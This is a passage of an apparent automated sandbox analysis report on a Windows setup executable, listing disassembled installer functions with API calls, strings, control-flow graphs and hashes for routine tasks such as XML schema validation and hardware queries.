                                                                                              • ^wu, xrefs: 63966A8C, 63966BF5
                                                                                              • Stopping XML schema validation of UI information and continuing, xrefs: 639669FA, 63966B9A
                                                                                              • Add to schema collection schema file - %s, xrefs: 63966C4D
                                                                                              • Validation FAILED Reason:%s, xrefs: 63966D5F
                                                                                              • CoCreateInstance of XMLSchemaCache60 failed with hr = 0x%x (%s), xrefs: 63966B7C
                                                                                              • UIInfo.xml, xrefs: 63966D8C, 63966EC3
                                                                                              • Loading file - %s, xrefs: 63966AF3
                                                                                              • Validation FAILED Err on line: %d @column: %dReason:%s SrcText:%s, xrefs: 63966E8B
                                                                                              • CoCreateInstance of DOMDocument60 failed with hr = 0x%x (%s), xrefs: 639669DC
                                                                                              • UiInfo.xml, xrefs: 63966A65
                                                                                              • SetupUi.xsd, xrefs: 63966BD7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ExistsFile$H_prolog3$ClearVariant$CreateInstanceLocaleRelativeThread$AppendException@8Throw
                                                                                              • String ID: Validation FAILED Reason:%s$Validation FAILED Err on line: %d @column: %dReason:%s SrcText:%s$Add to schema collection schema file - %s$CoCreateInstance of DOMDocument60 failed with hr = 0x%x (%s)$CoCreateInstance of XMLSchemaCache60 failed with hr = 0x%x (%s)$Loading file - %s$SetupUi.xsd$Stopping XML schema validation of UI information and continuing$UIInfo.xml$UiInfo.xml$http://schemas.microsoft.com/SetupUI/2008/01/imui$^wu
                                                                                              • API String ID: 3881019808-1965720155
                                                                                              • Opcode ID: e8a044614c746befe8d70f51de014bb908052a8ffa0293970dec286d3ae47222
                                                                                              • Instruction ID: 2da4ac5b64a3baad79b96c9a960ec5711e37c0604bea002b5ac38ec2f571ab2f
                                                                                              • Opcode Fuzzy Hash: e8a044614c746befe8d70f51de014bb908052a8ffa0293970dec286d3ae47222
                                                                                              • Instruction Fuzzy Hash: 940237B1D01249EFDF00DBE8C944ADDBBB8AF5A718F244598E510BB242D735EA05CF61
                                                                                              Function 63952B11 Relevance: 40.7, APIs: 11, Strings: 12, Instructions: 447COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 725 63952b11-63952ba8 call 6397265b call 6395e8e8 call 6394d65f call 63968460 call 6395e8e8 call 6394d65f call 6394d76f call 6395e8e8 call 63968460 744 63952bb0-63952c18 call 63968460 call 6395e8e8 call 6394d65f call 6394d76f call 6395e8e8 call 63968460 725->744 745 63952baa-63952bac 725->745 758 63952c20-63952c9b call 63968460 call 6395e8e8 call 6394d65f call 63968460 call 6395e8e8 call 6394d6c4 call 6394d76f 744->758 759 63952c1a-63952c1c 744->759 745->744 774 63952ca3-63952cde call 63968460 758->774 775 63952c9d-63952c9f 758->775 759->758 778 63952ce1-63952d22 call 6395e8e8 call 6394d6c4 call 6394d76f 774->778 775->774 785 63952d24-63952d26 778->785 786 63952d2a-63952d46 call 63968460 call 63968199 778->786 785->786 791 63952d48 786->791 792 63952d4b-63952d86 call 6395e8e8 call 6395f5fd call 63968460 * 2 786->792 791->792 792->778 801 63952d8c-63952da4 call 63951e75 PathIsRelativeW 792->801 804 63952da6-63952db6 PathFileExistsW 801->804 805 63952dbb-63952df4 call 639683fd call 6395f21d * 2 PathFileExistsW 801->805 806 63952e5a-63952e5c 804->806 832 63952df6-63952e0b call 6395ea8d call 6395f21d 805->832 833 63952e0e-63952e13 PathFileExistsW 805->833 809 63952e2c-63952e37 PathIsRelativeW 806->809 810 63952e5e-63952ebb call 6394c9bb call 6394cb96 call 63968460 call 6394d1b4 call 6396dbdb 806->810 811 63952ec0-63952ef3 call 639683fd call 6395f21d * 2 PathFileExistsW 809->811 812 63952e3d-63952e47 PathFileExistsW 809->812 810->811 853 63952ef5-63952f0a call 6395ea8d call 6395f21d 811->853 854 63952f0d-63952f12 PathFileExistsW 811->854 815 63952f92-63952f94 812->815 819 63952f27-63952f71 call 639683fd * 2 815->819 820 63952f96-63952fef call 6394c9bb call 6394cb96 call 63968460 call 6394d1b4 815->820 851 63952f77-63952f82 819->851 852 63953028-6395305a call 63968460 * 2 call 6395f5a3 call 63968460 819->852 888 63952ff7-63952ffa 820->888 832->833 835 63952e15-63952e27 call 6395ea8d call 63968460 833->835 836 63952e4c-63952e58 call 63968460 833->836 835->809 836->806 864 63952ffc-63952fff 851->864 892 63953062-63953081 call 63968460 * 2 852->892 893 6395305c-6395305e 852->893 853->854 860 63952f84-63952f90 call 63968460 854->860 861 63952f14-63952f22 call 6395ea8d call 63968460 854->861 860->815 861->819 867 63953005-6395300b 864->867 868 63953093-639530ab RaiseException 864->868 867->868 875 63953011-63953026 call 6395f5fd 867->875 875->852 875->888 888->864 898 63953083-63953085 892->898 899 63953089-63953090 call 63972709 892->899 893->892 898->899
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63952B1B
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                                • Part of subcall function 6394D76F: SysFreeString.OLEAUT32(00000000), ref: 6394D7CA
                                                                                              • PathIsRelativeW.SHLWAPI(?,00000001,?,000000FF,?,?,?,?,00000001,?,?,?,000000FF,00000088,63966F88,?), ref: 63952D9C
                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 63952DAF
                                                                                              • PathFileExistsW.KERNELBASE(00000005,?,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 63952DF0
                                                                                              • PathFileExistsW.KERNELBASE(00000005,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 63952E0F
                                                                                              • PathIsRelativeW.SHLWAPI(00000001,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 63952E2F
                                                                                              • PathFileExistsW.SHLWAPI(00000001,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 63952E40
                                                                                              • __CxxThrowException@8.LIBCMT ref: 63952EBB
                                                                                              • PathFileExistsW.KERNELBASE(00000005,00000001,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 63952EEF
                                                                                                • Part of subcall function 6395F21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,6394C3AE), ref: 6395F241
                                                                                              • PathFileExistsW.KERNELBASE(00000005,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 63952F0E
                                                                                                • Part of subcall function 639683FD: _memcpy_s.LIBCMT ref: 6396844E
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000), ref: 6395309C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ExistsFile$H_prolog3$Relative$AppendExceptionException@8FreeRaiseStringThrow_memcpy_s
                                                                                              • String ID: %$Caption$CreateLayout$Default$HeaderImage$Install$Repair$Uninstall$UninstallPatch$Watermark$WizardImages$^wu
                                                                                              • API String ID: 2164894574-1264716263
                                                                                              • Opcode ID: 78df54d37d0785e3c9e29d5ae4c5a36563b5931243fd3a55c34b4e8a807d74f8
                                                                                              • Instruction ID: 9395950c5b37c4e1dd48bcde6f9f779218b9d9e128e4a8d46298c3289b4c79c0
                                                                                              • Opcode Fuzzy Hash: 78df54d37d0785e3c9e29d5ae4c5a36563b5931243fd3a55c34b4e8a807d74f8
                                                                                              • Instruction Fuzzy Hash: 35124C7180424DEFDF00DFA8C984ADDBBB8AF1A728F148155F464AB281D734DA59CF61
                                                                                              Function 6C9009E3 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 228registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 902 6c9009e3-6c900a25 call 6c926e8d call 6c8c5727 908 6c900a27-6c900a2f GetLastError 902->908 909 6c900a3f 902->909 911 6c900a31-6c900a36 908->911 912 6c900a3b-6c900a3d 908->912 910 6c900a41-6c900a80 call 6c8f833e call 6c901236 call 6c918f0e 909->910 920 6c900a82-6c900a8a GetLastError 910->920 921 6c900a9a 910->921 911->912 912->910 922 6c900a96-6c900a98 920->922 923 6c900a8c-6c900a91 920->923 924 6c900a9c-6c900ae9 call 6c8f833e call 6c901236 call 6c918f0e RegOpenKeyExW 921->924 922->924 923->922 931 6c900bc2-6c900bd9 call 6c91e770 924->931 932 6c900aef-6c900b14 RegQueryValueExW 924->932 940 6c900bdc-6c900be1 931->940 933 6c900b52-6c900b5f RegCloseKey 932->933 934 6c900b16-6c900b34 RegQueryValueExW 932->934 937 6c900bc0 933->937 938 6c900b61-6c900b73 933->938 934->933 936 6c900b36-6c900b4f RegQueryValueExW 934->936 936->933 937->931 943 6c900b75-6c900b7d GetLastError 938->943 944 6c900b8d 938->944 940->940 942 6c900be3-6c900bf2 GlobalMemoryStatusEx 940->942 945 6c900bf4-6c900c13 942->945 946 6c900c4f-6c900c74 call 6c8f833e GetLastError call 6c901236 942->946 949 6c900b89-6c900b8b 943->949 950 6c900b7f-6c900b84 943->950 947 6c900b8f-6c900bbf call 6c8f833e call 6c901236 call 6c918f0e 944->947 954 6c900c15-6c900c1d GetLastError 945->954 955 6c900c2b-6c900c4d call 6c8f833e call 6c901236 945->955 965 6c900c77-6c900c8b call 6c918f0e call 6c903439 call 6c926f1f 946->965 947->937 949->947 950->949 958 6c900c29 954->958 959 6c900c1f-6c900c24 954->959 955->965 958->955 959->958
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C9009ED
                                                                                                • Part of subcall function 6C8C5727: GetModuleHandleW.KERNEL32(kernel32.dll,?,6C8C5782,00000000,6C8F831D), ref: 6C8C5731
                                                                                                • Part of subcall function 6C8C5727: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 6C8C5741
                                                                                              • GetLastError.KERNEL32 ref: 6C900A27
                                                                                              • GetLastError.KERNEL32 ref: 6C900A82
                                                                                              • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?,?,00000000,?,Failed to record NumberOfProcessor), ref: 6C900ADE
                                                                                              • RegQueryValueExW.KERNEL32(?,~MHz,00000000,00000000,?,?), ref: 6C900B0D
                                                                                              • RegQueryValueExW.ADVAPI32(?,~Mhz,00000000,00000000,?,?), ref: 6C900B2D
                                                                                              • RegQueryValueExW.ADVAPI32(?,~mhz,00000000,00000000,?,?), ref: 6C900B4D
                                                                                              • RegCloseKey.KERNEL32(?), ref: 6C900B55
                                                                                              • GetLastError.KERNEL32 ref: 6C900B75
                                                                                              • _memset.LIBCMT ref: 6C900BCC
                                                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,6C8BA738,?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C900BEA
                                                                                              • GetLastError.KERNEL32(?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C900C15
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • GetLastError.KERNEL32(?,GlobalMemoryStatusEx failed,?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C900C60
                                                                                                • Part of subcall function 6C901236: __EH_prolog3.LIBCMT ref: 6C90123D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$QueryValue$H_prolog3$AddressCloseGlobalH_prolog3_HandleMemoryModuleOpenProcStatus_memset
                                                                                              • String ID: Failed to record CpuArchitecture$Failed to record NumberOfProcessor$Failed to record SystemMemory$GlobalMemoryStatusEx failed$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz$~Mhz$~mhz
                                                                                              • API String ID: 2659457873-2309824155
                                                                                              • Opcode ID: 3a5852ab96209497073f853f575c5c17c9880c4eccef9fe62df9df8bfaf414d4
                                                                                              • Instruction ID: 05650480a991b96333a746642ea1cbca141b81da66532ea4c848229f36f3071c
                                                                                              • Opcode Fuzzy Hash: 3a5852ab96209497073f853f575c5c17c9880c4eccef9fe62df9df8bfaf414d4
                                                                                              • Instruction Fuzzy Hash: AB819D32A00248EBDB20CFE5CD45FDEBBB9AF05358F20462AE515EB690D774DA05DB90
                                                                                              Function 6C90D01E Relevance: 35.1, APIs: 3, Strings: 17, Instructions: 92COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C90D025
                                                                                                • Part of subcall function 6C8C5D3F: __EH_prolog3.LIBCMT ref: 6C8C5D46
                                                                                                • Part of subcall function 6C8C5D3F: GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104,?,6C8F831D,00000000), ref: 6C8C5D93
                                                                                                • Part of subcall function 6C8F8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9099FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C8F8E6E
                                                                                              • PathFileExistsW.SHLWAPI(?,6C8B61FC,graphics,?,00000054,6C90B48A,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C90D0BE
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C90D16E
                                                                                                • Part of subcall function 6C8F8F73: PathRemoveFileSpecW.SHLWAPI(00000000,2806C750,00000010,80004005,6C8C5DB8,6C8FF845,00000010,?,6C8F831D,00000000), ref: 6C8F8F84
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePath$H_prolog3$AppendException@8ExistsModuleNameRemoveSpecThrow
                                                                                              • String ID: Graphic file %s does not exists$Print.ico$Rotate1.ico$Rotate2.ico$Rotate3.ico$Rotate4.ico$Rotate5.ico$Rotate6.ico$Rotate7.ico$Rotate8.ico$Save.ico$Setup.ico$SysReqMet.ico$SysReqNotMet.ico$graphics$stop.ico$warn.ico
                                                                                              • API String ID: 419085990-1965610755
                                                                                              • Opcode ID: 00a38f29a76d50467e36f4aeed864fb76b272e6fb682117a31388365bc056ce0
                                                                                              • Instruction ID: 21f2e7ff36915f497d4910142499a70467a77325b449ad7df85d1ca9269ada81
                                                                                              • Opcode Fuzzy Hash: 00a38f29a76d50467e36f4aeed864fb76b272e6fb682117a31388365bc056ce0
                                                                                              • Instruction Fuzzy Hash: C04125B29006199BDB24DFE4CA46BDEBB75BF14304FA04819D424BBB50C7309A09CB91
                                                                                              Function 6C8DA82C Relevance: 33.9, APIs: 2, Strings: 17, Instructions: 638COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1009 6c8da82c-6c8da854 call 6c926e1a 1012 6c8da85c-6c8da87c call 6c8d6249 1009->1012 1013 6c8da856-6c8da858 1009->1013 1016 6c8da87e-6c8da880 1012->1016 1017 6c8da884-6c8da8a8 call 6c8d6440 1012->1017 1013->1012 1016->1017 1020 6c8da8aa-6c8da8ac 1017->1020 1021 6c8da8b0-6c8da8e4 call 6c8d69b7 call 6c8f833e 1017->1021 1020->1021 1026 6c8da8ec-6c8da8fe call 6c8c8d44 call 6c8d1c2e 1021->1026 1027 6c8da8e6-6c8da8e8 1021->1027 1031 6c8da903-6c8da90c 1026->1031 1027->1026 1032 6c8da90e-6c8da910 1031->1032 1033 6c8da914-6c8da94a call 6c918f0e call 6c8f833e 1031->1033 1032->1033 1038 6c8da94c-6c8da94e 1033->1038 1039 6c8da952-6c8da972 call 6c8c8d44 call 6c8d1d3d 1033->1039 1038->1039 1044 6c8da97a-6c8da9b0 call 6c918f0e call 6c8f833e 1039->1044 1045 6c8da974-6c8da976 1039->1045 1050 6c8da9b8-6c8da9de call 6c8c8d44 call 6c8d784c 1044->1050 1051 6c8da9b2-6c8da9b4 1044->1051 1045->1044 1056 6c8da9e6-6c8daa1b call 6c918f0e call 6c8f833e 1050->1056 1057 6c8da9e0-6c8da9e2 1050->1057 1051->1050 1062 6c8daa1d-6c8daa1f 1056->1062 1063 6c8daa23-6c8daa48 call 6c8c9411 call 6c8d3ba9 1056->1063 1057->1056 1062->1063 1068 6c8daa4a-6c8daa4c 1063->1068 1069 6c8daa50-6c8daa72 call 6c918f0e 1063->1069 1068->1069 1072 6c8daa7a-6c8daa99 call 6c8d6d1f 1069->1072 1073 6c8daa74-6c8daa76 1069->1073 1076 6c8daa9b-6c8daa9d 1072->1076 1077 6c8daaa1-6c8daac3 call 6c8d6e28 1072->1077 1073->1072 1076->1077 1080 6c8daacb-6c8dab73 call 6c8d70c5 call 6c8d97ce call 6c8f833e 1077->1080 1081 6c8daac5-6c8daac7 1077->1081 1088 6c8dab7b-6c8dabc1 call 6c8c95c1 call 6c918f0e call 6c8f833e 1080->1088 1089 6c8dab75-6c8dab77 1080->1089 1081->1080 1096 6c8dabc9-6c8dac09 call 6c8c9703 call 6c918f0e call 6c8f833e 1088->1096 1097 6c8dabc3-6c8dabc5 1088->1097 1089->1088 1104 6c8dac0b-6c8dac0d 1096->1104 1105 6c8dac11-6c8dac54 call 6c8c9703 call 6c918f0e call 6c8f833e 1096->1105 1097->1096 1104->1105 1112 6c8dac5c-6c8dac86 call 6c8c9703 call 6c918f0e 1105->1112 1113 6c8dac56-6c8dac58 1105->1113 1118 6c8dac8e-6c8daca9 call 6c8c89b7 1112->1118 1119 6c8dac88-6c8dac8a 1112->1119 1113->1112 1122 6c8dacab-6c8dacad 1118->1122 1123 6c8dacb1-6c8dacbc call 6c8c922c 1118->1123 1119->1118 1122->1123 1126 6c8dacbe-6c8dad0f call 6c8f833e * 2 call 6c8c838a call 6c918f0e * 2 call 6c8ca378 1123->1126 1127 6c8dad22-6c8dad46 call 6c8f833e 1123->1127 1152 6c8dad14-6c8dad1d call 6c9214aa 1126->1152 1132 6c8dad4e-6c8dad93 call 6c8c9703 call 6c8f833e call 6c8ca2b5 call 6c918f0e * 2 1127->1132 1133 6c8dad48-6c8dad4a 1127->1133 1155 6c8dad95-6c8dada9 call 6c8e2d50 1132->1155 1156 6c8dae06-6c8dae33 call 6c8f833e 1132->1156 1133->1132 1152->1127 1161 6c8dadbd 1155->1161 1162 6c8dadab-6c8dadb3 1155->1162 1163 6c8dae3b-6c8dae42 call 6c8c90aa 1156->1163 1164 6c8dae35-6c8dae37 1156->1164 1167 6c8dadbf-6c8dadcc call 6c918f0e 1161->1167 1165 6c8dadb9-6c8dadbb 1162->1165 1166 6c8dadb5-6c8dadb7 1162->1166 1172 6c8dae89 1163->1172 1173 6c8dae44-6c8dae74 call 6c8f833e 1163->1173 1164->1163 1165->1167 1166->1161 1166->1165 1167->1156 1175 6c8dadce-6c8dae01 call 6c8f833e * 2 call 6c8c838a 1167->1175 1174 6c8dae8b-6c8dae8f 1172->1174 1185 6c8dae7c-6c8dae83 call 6c8c90aa 1173->1185 1186 6c8dae76-6c8dae78 1173->1186 1177 6c8dae91-6c8dae9b call 6c918f0e 1174->1177 1178 6c8daea0-6c8daeab 1174->1178 1175->1152 1177->1178 1182 6c8daead-6c8daeb3 call 6c918f0e 1178->1182 1183 6c8daeb8-6c8daeba 1178->1183 1182->1183 1188 6c8daebc-6c8daefa call 6c8f833e * 2 call 6c8c838a call 6c918f0e 1183->1188 1189 6c8daf22-6c8daf2b 1183->1189 1185->1172 1202 6c8dae85-6c8dae87 1185->1202 1186->1185 1219 6c8daefe-6c8daf1a call 6c918f0e call 6c8ca378 1188->1219 1192 6c8daf2d-6c8daf6f call 6c8f833e * 2 call 6c8c838a call 6c918f0e 1189->1192 1193 6c8daf71-6c8daf7a 1189->1193 1192->1219 1197 6c8daf7c-6c8daf7e 1193->1197 1198 6c8daf82-6c8daf89 call 6c926f06 1193->1198 1197->1198 1202->1174 1219->1189
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8DA833
                                                                                                • Part of subcall function 6C8D1D3D: __EH_prolog3.LIBCMT ref: 6C8D1D44
                                                                                                • Part of subcall function 6C8D1D3D: __CxxThrowException@8.LIBCMT ref: 6C8D1E11
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8DAD1D
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: <$ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$CustomErrorHandling$IsPresent$MSIOptions$MSIRepairOptions$MSIUninstallOptions$ParameterInfo.xml$ProductCode$RepairOverride$UninstallOverride$schema validation failure: MSI, AgileMSI and AgileMSP do not support RepairOverride or UninstallOverride child elements!$schema validation failure: Product Code cannot be emoty.$schema validation failure: wrong number of MSI child nodes!
                                                                                              • API String ID: 2489616738-1903366528
                                                                                              • Opcode ID: fc8567d95ae43713faaa82ea763fdea8feeccebc721f7e16321c0cef9f4bebf4
                                                                                              • Instruction ID: 09d07609f90c74e4324d5dd11093254bcff93e2c5918b438d5e5654f62a14bd0
                                                                                              • Opcode Fuzzy Hash: fc8567d95ae43713faaa82ea763fdea8feeccebc721f7e16321c0cef9f4bebf4
                                                                                              • Instruction Fuzzy Hash: C4426171604249EFDB14CFA8CA44ADE7BB9BF19318F144959F824EB780C734EA09CB61
                                                                                              Function 6C8E2582 Relevance: 32.0, APIs: 2, Strings: 16, Instructions: 464COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1224 6c8e2582-6c8e25bb call 6c926e1a call 6c8c8996 call 6c8f85bc 1231 6c8e25bd-6c8e25d1 call 6c91c0aa 1224->1231 1232 6c8e2635-6c8e2645 call 6c8f85bc 1224->1232 1237 6c8e260f 1231->1237 1238 6c8e25d3-6c8e25fd call 6c8f833e 1231->1238 1239 6c8e2688-6c8e2698 call 6c8f85bc 1232->1239 1240 6c8e2647-6c8e265b call 6c91c0aa 1232->1240 1241 6c8e2611-6c8e261f 1237->1241 1254 6c8e25ff-6c8e2601 1238->1254 1255 6c8e2605-6c8e2608 call 6c8da82c 1238->1255 1251 6c8e26da-6c8e26ea call 6c8f85bc 1239->1251 1252 6c8e269a-6c8e26ae call 6c91c0aa 1239->1252 1256 6c8e28bd 1240->1256 1257 6c8e2661-6c8e2671 1240->1257 1245 6c8e28c6-6c8e28f1 call 6c8f833e call 6c9268b5 1241->1245 1246 6c8e2625-6c8e2630 call 6c918f0e 1241->1246 1280 6c8e2938-6c8e297b call 6c8f8cd5 call 6c8f8c7a call 6c8f8c24 1245->1280 1281 6c8e28f3-6c8e2936 call 6c8d6cb7 call 6c918eab call 6c8f84b9 call 6c918f0e * 2 1245->1281 1246->1245 1272 6c8e26ec-6c8e2700 call 6c91c0aa 1251->1272 1273 6c8e272b-6c8e273b call 6c8f85bc 1251->1273 1252->1256 1274 6c8e26b4-6c8e26c5 1252->1274 1254->1255 1268 6c8e260d 1255->1268 1260 6c8e28bf-6c8e28c3 1256->1260 1262 6c8e2679-6c8e2683 call 6c8df05d 1257->1262 1263 6c8e2673-6c8e2675 1257->1263 1260->1245 1262->1260 1263->1262 1268->1241 1272->1256 1287 6c8e2706-6c8e2716 1272->1287 1290 6c8e277d-6c8e278d call 6c8f85bc 1273->1290 1291 6c8e273d-6c8e2751 call 6c91c0aa 1273->1291 1277 6c8e26cd-6c8e26d5 call 6c8db69b 1274->1277 1278 6c8e26c7-6c8e26c9 1274->1278 1277->1260 1278->1277 1320 6c8e2980-6c8e29c0 call 6c918f0e * 5 1280->1320 1281->1280 1294 6c8e271e-6c8e2726 call 6c8dd8a6 1287->1294 1295 6c8e2718-6c8e271a 1287->1295 1307 6c8e278f-6c8e27a3 call 6c91c0aa 1290->1307 1308 6c8e27d0-6c8e27e0 call 6c8f85bc 1290->1308 1291->1256 1304 6c8e2757-6c8e2768 1291->1304 1294->1260 1295->1294 1310 6c8e276a-6c8e276c 1304->1310 1311 6c8e2770-6c8e2778 call 6c8dc922 1304->1311 1307->1256 1325 6c8e27a9-6c8e27b9 1307->1325 1323 6c8e27e2-6c8e27f6 call 6c91c0aa 1308->1323 1324 6c8e2823-6c8e2833 call 6c8f85bc 1308->1324 1310->1311 1311->1260 1374 6c8e29c8-6c8e29d0 call 6c926f06 1320->1374 1375 6c8e29c2-6c8e29c4 1320->1375 1323->1256 1341 6c8e27fc-6c8e280c 1323->1341 1338 6c8e286e-6c8e287e call 6c8f85bc 1324->1338 1339 6c8e2835-6c8e2849 call 6c91c0aa 1324->1339 1329 6c8e27bb-6c8e27bd 1325->1329 1330 6c8e27c1-6c8e27c6 call 6c8de30e 1325->1330 1329->1330 1337 6c8e27cb 1330->1337 1337->1260 1354 6c8e2884-6c8e2898 call 6c91c0aa 1338->1354 1355 6c8e29d3-6c8e2ad5 call 6c8f8cd5 call 6c8f8c7a call 6c918f0e * 2 call 6c8f833e call 6c8f8cd5 call 6c8c838a call 6c918f0e * 2 call 6c8c8415 call 6c918f0e call 6c8ca378 call 6c9214aa call 6c8d632c 1338->1355 1339->1256 1351 